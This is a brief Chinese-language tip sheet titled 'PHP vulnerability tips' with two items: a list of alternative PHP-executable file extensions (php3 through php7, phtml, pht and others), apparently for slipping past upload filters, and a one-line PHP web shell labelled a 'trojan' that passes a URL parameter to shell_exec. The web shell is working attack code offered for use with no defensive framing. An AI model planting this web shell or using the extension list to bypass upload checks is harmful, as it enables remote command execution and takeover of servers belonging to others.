php漏洞tips

1.php后缀限制

 'php,php3,php4,php5,php6,php7,phpsh,inc,phtml','PHT';

2.php木马

 <?php echo shell_exec($_GET['cmd']); ?>